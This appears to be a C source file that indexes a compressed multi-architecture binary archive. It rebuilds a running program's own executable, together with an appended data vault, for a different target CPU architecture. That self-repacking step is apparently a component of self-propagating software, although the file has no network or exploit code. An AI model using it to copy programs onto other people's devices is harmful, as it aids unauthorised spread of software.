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#include "pack.h"
#include "util_ct.h"
#include "util_rt.h"
#include "endian.h"
#include "config.h"
#include <string.h>
#include <errno.h>
typedef struct {
const uint8_t *data;
size_t rem;
} pack_rcb_pt_octx_t;
typedef struct {
uint8_t buf[4096];
const uint8_t *m_dv;
size_t dv_len;
size_t ofs;
const prne_bin_tuple_t *t;
const prne_bin_archive_t *ba;
size_t buf_len; // 0: used as z_stream buffer, > 0: used as something else
size_t seek, skip; // Offset to binary to exclude and its length
z_stream z_old, z_ny;
prne_arch_t a_self;
} pack_rcb_rb_octx_t;
void prne_init_bin_archive (prne_bin_archive_t *a) {
prne_memzero(a, sizeof(prne_bin_archive_t));
}
void prne_free_bin_archive (prne_bin_archive_t *a) {
prne_free(a->bin);
a->bin = NULL;
a->nb_bin = 0;
}
prne_pack_rc_t prne_index_bin_archive (
const uint8_t *data,
size_t len,
prne_bin_archive_t *out)
{
prne_pack_rc_t ret = PRNE_PACK_RC_OK;
prne_bin_tuple_t *bin = NULL;
size_t nb_bin, i, sum = 0;
if (len < 4) {
ret = PRNE_PACK_RC_FMT_ERR;
goto END;
}
nb_bin = data[0];
len -= 4;
data += 4;
if (nb_bin * 4 > len) {
ret = PRNE_PACK_RC_FMT_ERR;
goto END;
}
/* FIXME
* Is an empty bin archive possible?
* This will fail when nb_bin == 0
*/
bin = (prne_bin_tuple_t*)prne_malloc(sizeof(prne_bin_tuple_t), nb_bin);
if (bin == NULL) {
ret = PRNE_PACK_RC_ERRNO;
goto END;
}
for (i = 0; i < nb_bin; i += 1) {
bin[i].arch = (prne_arch_t)data[0];
bin[i].size = prne_recmb_msb32(0, data[1], data[2], data[3]);
sum += bin[i].size;
data += 4;
len -= 4;
}
out->data = data;
out->data_size = len;
out->nb_bin = nb_bin;
out->bin = bin;
bin = NULL;
END:
prne_free(bin);
return ret;
}
void prne_init_bin_rcb_ctx (prne_bin_rcb_ctx_t *ctx) {
prne_memzero(ctx, sizeof(prne_bin_rcb_ctx_t));
}
void prne_free_bin_rcb_ctx (prne_bin_rcb_ctx_t *ctx) {
ctx->read_f = NULL;
if (ctx->o_ctx != NULL) {
ctx->ctx_free_f(ctx->o_ctx);
ctx->o_ctx = NULL;
ctx->ctx_free_f = NULL;
}
}
void pack_rcb_free_pt_octx (void *p) {
prne_free(p);
}
void pack_rcb_free_rb_octx (void *p) {
pack_rcb_rb_octx_t *ctx = (pack_rcb_rb_octx_t*)p;
inflateEnd(&ctx->z_old);
deflateEnd(&ctx->z_ny);
prne_free(ctx);
}
static ssize_t pack_rcb_nullread_f (
prne_bin_rcb_ctx_t *ctx,
uint8_t *buf,
size_t len,
prne_pack_rc_t *prc,
int *err)
{
prne_chk_assign(prc, PRNE_PACK_RC_EOF);
prne_chk_assign(err, 0);
return 0;
}
static ssize_t pack_rcb_ptread_f (
prne_bin_rcb_ctx_t *ctx_p,
uint8_t *buf,
size_t len,
prne_pack_rc_t *prc,
int *err)
{
pack_rcb_pt_octx_t *ctx = (pack_rcb_pt_octx_t*)ctx_p->o_ctx;
const size_t consume = prne_op_min(len, ctx->rem);
memcpy(buf, ctx->data, consume);
ctx->data += consume;
ctx->rem -= consume;
if (ctx->rem == 0) {
ctx_p->read_f = pack_rcb_nullread_f;
ctx_p->ctx_free_f(ctx);
ctx_p->o_ctx = NULL;
ctx_p->ctx_free_f = NULL;
}
prne_chk_assign(prc, PRNE_PACK_RC_OK);
prne_chk_assign(err, 0);
return consume;
}
static ssize_t pack_rcb_rpread_f (
prne_bin_rcb_ctx_t *ctx_p,
uint8_t *buf,
size_t len,
prne_pack_rc_t *out_prc,
int *out_err)
{
prne_pack_rc_t prc = PRNE_PACK_RC_OK;
int err = 0;
pack_rcb_rb_octx_t *ctx = (pack_rcb_rb_octx_t*)ctx_p->o_ctx;
size_t consume;
if (ctx->buf_len > 0) {
// alignment and index
consume = prne_op_min(ctx->buf_len, len);
memcpy(buf, ctx->buf, consume);
memmove(ctx->buf, ctx->buf + consume, ctx->buf_len - consume);
ctx->buf_len -= consume;
}
else {
int d_flush = Z_NO_FLUSH;
if (ctx->z_ny.avail_in == 0) {
if (ctx->seek > 0) {
consume = prne_op_min(sizeof(ctx->buf), ctx->seek);
}
else if (ctx->skip > 0) {
consume = prne_op_min(sizeof(ctx->buf), ctx->skip);
}
else {
consume = sizeof(ctx->buf);
}
ctx->z_old.avail_out = consume;
ctx->z_old.next_out = ctx->buf;
err = inflate(&ctx->z_old, Z_FINISH);
switch (err) {
case Z_STREAM_END:
d_flush = Z_FINISH;
/* fall-through */
case Z_BUF_ERROR:
case Z_OK:
err = 0;
break;
default:
consume = -1;
prc = PRNE_PACK_RC_Z_ERR;
goto END;
}
consume -= ctx->z_old.avail_out;
if (ctx->seek > 0) {
ctx->seek -= consume;
}
else if (ctx->skip > 0) {
ctx->skip -= consume;
consume = 0;
goto END;
}
ctx->z_ny.next_in = ctx->buf;
ctx->z_ny.avail_in = consume;
if (consume == 0 && d_flush != Z_FINISH) {
// short compressed data
// this means that bin arch is incomplete
consume = -1;
prc = PRNE_PACK_RC_FMT_ERR;
goto END;
}
}
ctx->z_ny.avail_out = len;
ctx->z_ny.next_out = buf;
err = deflate(&ctx->z_ny, d_flush);
switch (err) {
case Z_STREAM_END:
ctx_p->read_f = pack_rcb_nullread_f;
/* fall-through */
case Z_BUF_ERROR:
case Z_OK:
err = 0;
break;
default:
consume = -1;
prc = PRNE_PACK_RC_Z_ERR;
goto END;
}
consume = len - ctx->z_ny.avail_out;
}
END:
prne_chk_assign(out_prc, prc);
prne_chk_assign(out_err, err);
return consume;
}
static ssize_t pack_rcb_dvread_f (
prne_bin_rcb_ctx_t *ctx_p,
uint8_t *buf,
size_t len,
prne_pack_rc_t *out_prc,
int *out_err)
{
pack_rcb_rb_octx_t *ctx = (pack_rcb_rb_octx_t*)ctx_p->o_ctx;
size_t consume;
if (ctx->buf_len > 0) {
// alignment and appendix
consume = prne_op_min(ctx->buf_len, len);
memcpy(buf, ctx->buf, consume);
memmove(ctx->buf, ctx->buf + consume, ctx->buf_len - consume);
ctx->buf_len -= consume;
}
else {
// dv
consume = prne_op_min(ctx->skip, len);
memcpy(buf, ctx->m_dv, consume);
ctx->skip -= consume;
ctx->m_dv += consume;
if (ctx->skip == 0) {
prne_bin_tuple_t *t;
uint8_t *nb_bin_loc;
// alignment and bin archive index
prne_static_assert(
sizeof(ctx->buf) >= PRNE_BIN_ALIGNMENT + NB_PRNE_ARCH * 4,
"FIXME");
ctx->buf_len =
prne_salign_next(ctx->dv_len, PRNE_BIN_ALIGNMENT)
- ctx->dv_len;
prne_memzero(ctx->buf, ctx->buf_len);
nb_bin_loc = &ctx->buf[ctx->buf_len + 0];
*nb_bin_loc = 0;
ctx->buf[ctx->buf_len + 1] = 0;
ctx->buf[ctx->buf_len + 2] = 0;
ctx->buf[ctx->buf_len + 3] = 0;
ctx->buf_len += 4;
if (ctx->a_self != PRNE_ARCH_NONE) {
ctx->buf[ctx->buf_len + 0] = (uint8_t)ctx->a_self;
ctx->buf[ctx->buf_len + 1] =
prne_getmsb32(ctx->z_ny.avail_in, 1);
ctx->buf[ctx->buf_len + 2] =
prne_getmsb32(ctx->z_ny.avail_in, 2);
ctx->buf[ctx->buf_len + 3] =
prne_getmsb32(ctx->z_ny.avail_in, 3);
ctx->buf_len += 4;
*nb_bin_loc += 1;
}
for (size_t i = 0; i < ctx->ba->nb_bin; i += 1) {
t = ctx->ba->bin + i;
if (t->arch == ctx->t->arch) {
continue;
}
ctx->buf[ctx->buf_len + 0] = (uint8_t)t->arch;
ctx->buf[ctx->buf_len + 1] = prne_getmsb32(t->size, 1);
ctx->buf[ctx->buf_len + 2] = prne_getmsb32(t->size, 2);
ctx->buf[ctx->buf_len + 3] = prne_getmsb32(t->size, 3);
ctx->buf_len += 4;
*nb_bin_loc += 1;
}
ctx->seek = ctx->ofs;
ctx->skip = ctx->t->size;
ctx_p->read_f = pack_rcb_rpread_f;
}
}
prne_chk_assign(out_prc, PRNE_PACK_RC_OK);
prne_chk_assign(out_err, 0);
return consume;
}
static ssize_t pack_rcb_eeread_f (
prne_bin_rcb_ctx_t *ctx_p,
uint8_t *buf,
size_t len,
prne_pack_rc_t *out_prc,
int *out_err)
{
prne_pack_rc_t prc = PRNE_PACK_RC_OK;
int err = 0;
pack_rcb_rb_octx_t *ctx = (pack_rcb_rb_octx_t*)ctx_p->o_ctx;
size_t consume;
if (ctx->seek > 0) {
ctx->z_old.avail_out = prne_op_min(sizeof(ctx->buf), ctx->seek);
ctx->z_old.next_out = ctx->buf;
}
else {
ctx->z_old.avail_out = prne_op_min(len, ctx->skip);
ctx->z_old.next_out = buf;
}
consume = ctx->z_old.avail_out;
err = inflate(&ctx->z_old, Z_FINISH);
switch (err) {
case Z_STREAM_END:
case Z_BUF_ERROR:
case Z_OK:
err = 0;
break;
default:
consume = -1;
prc = PRNE_PACK_RC_Z_ERR;
goto END;
}
consume -= ctx->z_old.avail_out;
if (ctx->seek > 0) {
ctx->seek -= consume;
consume = 0;
}
else {
ctx->skip -= consume;
if (ctx->skip == 0) {
// alignment and appendix
const size_t aligned = prne_salign_next(
ctx->t->size,
PRNE_BIN_ALIGNMENT);
if ((err = inflateEnd(&ctx->z_old)) != Z_OK ||
(err = inflateInit(&ctx->z_old)) != Z_OK)
{
prc = PRNE_PACK_RC_Z_ERR;
goto END;
}
err = 0;
ctx->z_old.avail_in = ctx->ba->data_size;
ctx->z_old.next_in = (uint8_t*)ctx->ba->data;
prne_static_assert(
sizeof(ctx->buf) >= PRNE_BIN_ALIGNMENT + 8,
"FIXME");
ctx->buf_len = aligned - ctx->t->size;
prne_memzero(ctx->buf, ctx->buf_len);
ctx->buf[ctx->buf_len + 0] = prne_getmsb16(ctx->dv_len, 0);
ctx->buf[ctx->buf_len + 1] = prne_getmsb16(ctx->dv_len, 1);
ctx->buf[ctx->buf_len + 2] = 0;
ctx->buf[ctx->buf_len + 3] = 0;
ctx->buf[ctx->buf_len + 4] = 0;
ctx->buf[ctx->buf_len + 5] = 0;
ctx->buf[ctx->buf_len + 6] = 0;
ctx->buf[ctx->buf_len + 7] = 0;
ctx->buf_len += 8;
ctx->skip = ctx->dv_len;
ctx_p->read_f = pack_rcb_dvread_f;
}
}
END:
prne_chk_assign(out_prc, prc);
prne_chk_assign(out_err, err);
return consume;
}
prne_pack_rc_t prne_start_bin_rcb (
prne_bin_rcb_ctx_t *ctx,
const prne_arch_t target,
const prne_arch_t self,
const uint8_t *m_self,
const size_t self_len,
const size_t exec_len,
const uint8_t *m_dvault,
const size_t dvault_len,
const prne_bin_archive_t *ba)
{
if (!prne_arch_inrange(target) ||
(!prne_arch_inrange(self) && self != PRNE_ARCH_NONE))
{
return PRNE_PACK_RC_INVAL;
}
if (self == target) {
pack_rcb_pt_octx_t *ny_ctx =
(pack_rcb_pt_octx_t*)prne_malloc(sizeof(pack_rcb_pt_octx_t), 1);
if (ny_ctx == NULL) {
return PRNE_PACK_RC_ERRNO;
}
ny_ctx->data = m_self;
ny_ctx->rem = self_len;
prne_free_bin_rcb_ctx(ctx);
ctx->ctx_free_f = pack_rcb_free_pt_octx;
ctx->o_ctx = ny_ctx;
ctx->read_f = pack_rcb_ptread_f;
}
else {
pack_rcb_rb_octx_t *ny_ctx = NULL;
prne_bin_tuple_t *t = NULL;
size_t seek = 0;
for (size_t i = 0; i < ba->nb_bin; i += 1) {
if (ba->bin[i].arch == target) {
t = &ba->bin[i];
break;
}
seek += ba->bin[i].size;
}
if (t == NULL) {
return PRNE_PACK_RC_NO_ARCH;
}
ny_ctx =
(pack_rcb_rb_octx_t*)prne_malloc(sizeof(pack_rcb_rb_octx_t), 1);
if (ny_ctx == NULL) {
return PRNE_PACK_RC_ERRNO;
}
prne_memzero(ny_ctx, sizeof(pack_rcb_rb_octx_t));
if (inflateInit(&ny_ctx->z_old) != Z_OK ||
deflateInit(&ny_ctx->z_ny, PRNE_PACK_Z_LEVEL) != Z_OK)
{
inflateEnd(&ny_ctx->z_old);
deflateEnd(&ny_ctx->z_ny);
prne_free(ny_ctx);
return PRNE_PACK_RC_Z_ERR;
}
ny_ctx->m_dv = m_dvault;
ny_ctx->dv_len = dvault_len;
ny_ctx->ofs = seek;
ny_ctx->t = t;
ny_ctx->ba = ba;
ny_ctx->seek = seek;
ny_ctx->skip = t->size;
ny_ctx->z_old.avail_in = ba->data_size;
ny_ctx->z_old.next_in = (uint8_t*)ba->data;
if (self != PRNE_ARCH_NONE) {
ny_ctx->z_ny.avail_in = exec_len;
ny_ctx->z_ny.next_in = (uint8_t*)m_self;
}
ny_ctx->a_self = self;
prne_free_bin_rcb_ctx(ctx);
ctx->ctx_free_f = pack_rcb_free_rb_octx;
ctx->o_ctx = ny_ctx;
ctx->read_f = pack_rcb_eeread_f;
}
return PRNE_PACK_RC_OK;
}
ssize_t prne_bin_rcb_read (
prne_bin_rcb_ctx_t *ctx,
uint8_t *buf,
size_t len,
prne_pack_rc_t *prc,
int *err)
{
return ctx->read_f(ctx, buf, len, prc, err);
}
bool prne_index_nybin (
const uint8_t *m_nybin,
const size_t nybin_len,
const uint8_t **m_dv,
size_t *dv_len,
const uint8_t **m_ba,
size_t *ba_len)
{
if (nybin_len < 8) {
return false;
}
*dv_len = prne_recmb_msb16(m_nybin[0], m_nybin[1]);
if (8 + *dv_len > nybin_len) {
return false;
}
*m_dv = m_nybin + 8;
*m_ba = m_nybin + 8 + prne_salign_next(*dv_len, PRNE_BIN_ALIGNMENT);
*ba_len = nybin_len - (*m_ba - m_nybin);
return true;
}
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